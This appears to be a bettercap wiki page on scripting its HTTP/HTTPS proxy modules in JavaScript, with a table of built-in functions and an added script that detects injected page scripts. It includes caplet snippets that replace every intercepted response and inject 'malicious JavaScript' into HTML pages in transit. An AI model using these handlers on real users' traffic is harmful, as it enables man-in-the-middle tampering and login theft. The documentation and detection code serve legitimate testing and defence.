http.modules - rhaidiz/bettercap GitHub Wiki
The `http.proxy` and `https.proxy` modules can be scripted using JavaScript files that must declare at least one of the following functions:

```javascript
// called when the script is loaded
function onLoad() {
}

// called when the request is received by the proxy
// and before it is sent to the real server.
function onRequest(req, res) {
}

// called when the request is sent to the real server
// and a response is received
function onResponse(req, res) {
}

// called every time an unknown session command is typed,
// proxy modules can optionally handle custom commands this way:
function onCommand(cmd) {
    if( cmd == "test" ) {
        /*
         * Custom session command logic here.
         */

        // tell the session we handled this command
        return true
    }
}
```

Modules can change the `req` request and `res` response objects. For instance, the `web-override.cap` caplet uses the `onRequest` function to override every request, before it is executed, with a fake response:

```javascript
function onRequest(req, res) {
    // replace the response with a local file
    res.Status      = 200;
    res.ContentType = "text/html";
    res.Body        = readFile("caplets/www/index.html");

    // drop every header currently set on the response
    var headers = res.Headers.split("\r\n");
    for (var i = 0; i < headers.length; i++) {
        var header_name = headers[i].replace(/:.*/, "");
        res.RemoveHeader(header_name);
    }
    res.SetHeader("Connection", "close");
}
```

The `login-man-abuse.cap` caplet instead uses the `onResponse` handler to inject its malicious JavaScript file into every HTML response:

```javascript
function onResponse(req, res) {
    if( res.ContentType.indexOf('text/html') == 0 ){
        var body = res.ReadBody();
        if( body.indexOf('</head>') != -1 ) {
            res.Body = body.replace(
                '</head>',
                '<script type="text/javascript">' + "\n" +
                    AbuserJavascript +
                '</script>' +
                '</head>'
            );
        }
    }
}
```

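
A defender-side check for the `</head>` injection shown above, as an added example that is not part of the bettercap wiki or its caplets: it compares a page as published with the same page as received over the network and reports `<script>` elements that only the received copy contains. The function names and both sample pages are constructed for illustration.

```javascript
// Added example: report <script> elements present in the received page
// but absent from the published baseline.
// Regex-based extraction is an approximation that is adequate for this check.
const SCRIPT_RE = /<script\b([^>]*)>([\s\S]*?)<\/script\s*>/gi;

function listScripts(html) {
  const scripts = [];
  for (const m of html.matchAll(SCRIPT_RE)) {
    const src = /\bsrc\s*=\s*["']?([^"'\s>]+)/i.exec(m[1]);
    const end = m.index + m[0].length;
    scripts.push({
      // external scripts are identified by URL, inline ones by their content
      key: src ? "src:" + src[1] : "inline:" + m[2].trim(),
      // true when the element sits directly in front of </head>,
      // the position the onResponse handler on this page writes to
      beforeHeadClose: /^\s*<\/head>/i.test(html.slice(end)),
    });
  }
  return scripts;
}

function findInjectedScripts(baselineHtml, observedHtml) {
  // Count baseline scripts so a duplicated legitimate script is also reported.
  const expected = new Map();
  for (const s of listScripts(baselineHtml)) {
    expected.set(s.key, (expected.get(s.key) || 0) + 1);
  }
  const unexpected = [];
  for (const s of listScripts(observedHtml)) {
    const left = expected.get(s.key) || 0;
    if (left > 0) expected.set(s.key, left - 1);
    else unexpected.push(s);
  }
  return unexpected;
}

// Constructed sample input (not captured traffic).
const BASELINE = '<html><head><title>Login</title>' +
  '<script src="/static/app.js"></script></head><body><form></form></body></html>';
const OBSERVED = '<html><head><title>Login</title>' +
  '<script src="/static/app.js"></script>' +
  '<script type="text/javascript">\n/* constructed placeholder */</script>' +
  '</head><body><form></form></body></html>';

console.log(findInjectedScripts(BASELINE, OBSERVED));
```

The web-override example above also shows response headers being removed in transit, so this comparison works on the body rather than on headers such as `Content-Security-Policy`.
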
Modules can use the following builtin functions.

| function | description |
|---|---|
| `readFile("/path/to/file")` | Return the contents of a file as a string. |
| `writeFile("/path/to/file", "hello world")` | Write the string `hello world` to a file, returns `null` or an error message. |
| `log_debug("message")` | Log a message in the interactive session (its level will be `DEBUG`). |
| `log_info("message")` | Log a message in the interactive session (its level will be `INFO`). |
| `log_warn("message")` | Log a message in the interactive session (its level will be `WARNING`). |
| `log_error("message")` | Log a message in the interactive session (its level will be `ERROR`). |
| `log_fatal("message")` | Log a message in the interactive session (its level will be `FATAL`). |
| `log("message")` | Shortcut for `log_info("message")`. |
| `btoa("message")` | Encode a message to base64. |
| `atob("bWVzc2FnZQ==")` | Decode a message from base64. |
| `env("iface.ipv4")` | Read a variable. |
| `env("foo", "bar")` | Set a variable. |